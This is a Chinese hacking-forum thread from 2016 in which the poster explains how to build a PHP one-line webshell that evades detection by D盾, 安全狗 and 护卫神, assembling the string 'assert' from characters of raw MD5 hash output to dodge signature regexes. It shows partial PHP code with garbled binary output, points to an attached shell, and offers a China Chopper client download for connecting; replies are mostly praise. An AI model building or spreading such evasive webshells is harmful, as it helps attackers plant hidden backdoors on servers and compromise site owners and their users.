请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 6767|回复: 121

[原创文章] 免杀php一句话(打造)已过(D盾/最新安全狗)应该能过全部

  [复制链接]
  • TA的每日心情
    擦汗
    2016-8-5 00:12
  • 签到天数: 14 天

    [LV.3]偶尔看看II

    发表于 2016-7-25 11:21:42 | 显示全部楼层 |阅读模式
    看了轩轩的免杀一句话 基本明白原理了
    所以也自动动手打造了一个免杀的PHP
    让我装一下(免杀所有防护 已测试(最新版安全狗,护卫神))
    受人之鱼不如授人之渔
    不听我BB的直接就往下去下载吧
    说下思路吧 然后你们也看着转换
    php木马查杀正则匹配作为特征
    绕过正则匹配 利用系统函数去搞
    他也不敢乱杀。。。。。。。。
    思路是来自补天小游戏中md5注入
    不知道的可以看看这个文章:http://www.ilrose.com/blog/2015/07/08/md5%E5%8A%A0%E5%AF%86%E5%90%8E%E7%9A%84sql-%E6%B3%A8%E5%85%A5/
    然后就是获取自己需要的字母了
    1.png
    [PHP] 纯文本查看 复制代码
    $cars="e";//array("a","b","c","d","e","f","g","h","j","k");
    ?g??.?c8E?A?2
    $c= hash("md5",$cars, true);
    echo substr($c, -5,1); E
    echo substr($c, -3,1); A
    ?>  
    assert
    ??L?uO??eT??)??
    <?php
    $cars="f";//array("a","b","c","d","e","f","g","h","j","k");
    $c= hash("md5",$cars, true);
    echo substr($c, -7,1); T
    ?>
    ????Y?l?A|r?????
    <?php
    $cars=";";//array("a","b","c","d","e","f","g","h","j","k");
    $c= hash("md5",$cars, true);
    echo substr($c, -6,1); R
    ?>
    5?ˊ?????4;R?7s?
    <?php
    $cars="'";//array("a","b","c","d","e","f","g","h","j","k");
    $c= hash("md5",$cars, true);
    echo substr($c, -2,1);s
    ?>
    ??_???/?:?wu1W?
    <?php
    $cars="b";//array("a","b","c","d","e","f","g","h","j","k");
    $c= hash("md5",$cars, true);
    echo substr($c, -2,1);s
    ?>
    ?w??
    u??Hyv???
    <?php
    
    $cars="d";//array("a","b","c","d","e","f","g","h","j","k");
    $c= hash("md5",$cars, true);
    echo $c;
    
    ?>
    

    然后就是字符串提取跟拼装
    具体代码看附件里面的一句话吧
    33.png
    222.png

    其实免杀了以后你怎么连接也是个问题了
    POST这些参数 都会检测的 头文件这些
    我是用最新版的菜刀去连接的  因为附加数据不一样  老版的安全狗不让过 但是不杀文件
    4.png

    最后也附上新版的菜刀下载吧
    中国菜刀.zip (688.09 KB, 下载次数: 186)

    评分

    参与人数 1下载币 +10 荣誉 +2 收起 理由
    轩轩 + 10 + 2 厉害,不过我要说一下 现在安全狗不用关键.

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-3-21 11:05
  • 签到天数: 43 天

    [LV.5]常住居民I

    发表于 2016-7-25 16:50:01 | 显示全部楼层
    6的可以
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    4 天前
  • 签到天数: 337 天

    [LV.8]以坛为家I

    发表于 2016-7-25 17:04:04 | 显示全部楼层
    厉害   原创置顶帖 收录了
  • TA的每日心情
    擦汗
    2016-8-5 00:12
  • 签到天数: 14 天

    [LV.3]偶尔看看II

     楼主| 发表于 2016-7-25 17:09:02 | 显示全部楼层
    轩轩 发表于 2016-7-25 17:04
    厉害   原创置顶帖 收录了

    (安全狗不用关键)  不太熟悉 看你代码思想重新回炉的
  • TA的每日心情
    开心
    2017-3-8 09:17
  • 签到天数: 129 天

    [LV.7]常住居民III

    发表于 2016-7-25 17:38:18 | 显示全部楼层
    学习一下
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2016-12-31 03:49
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2016-7-25 18:15:15 | 显示全部楼层
    着刀谁敢下啊
  • TA的每日心情
    擦汗
    4 天前
  • 签到天数: 56 天

    [LV.5]常住居民I

    发表于 2016-7-25 18:32:25 | 显示全部楼层
    感谢分享。。。。。。。
    回复

    使用道具 举报

  • TA的每日心情
    开心
    3 天前
  • 签到天数: 184 天

    [LV.7]常住居民III

    发表于 2016-7-25 18:40:10 | 显示全部楼层
    过来看看学习学习
  • TA的每日心情
    慵懒
    前天 10:02
  • 签到天数: 148 天

    [LV.7]常住居民III

    发表于 2016-7-25 19:08:38 | 显示全部楼层
    =.=  果然sss还是大神多
  • TA的每日心情
    擦汗
    2016-8-5 00:12
  • 签到天数: 14 天

    [LV.3]偶尔看看II

     楼主| 发表于 2016-7-25 19:18:33 | 显示全部楼层

    到是菜刀官网的。。。。我没加任何东西
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-3-29 01:41 , Processed in 0.228051 second(s), 37 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表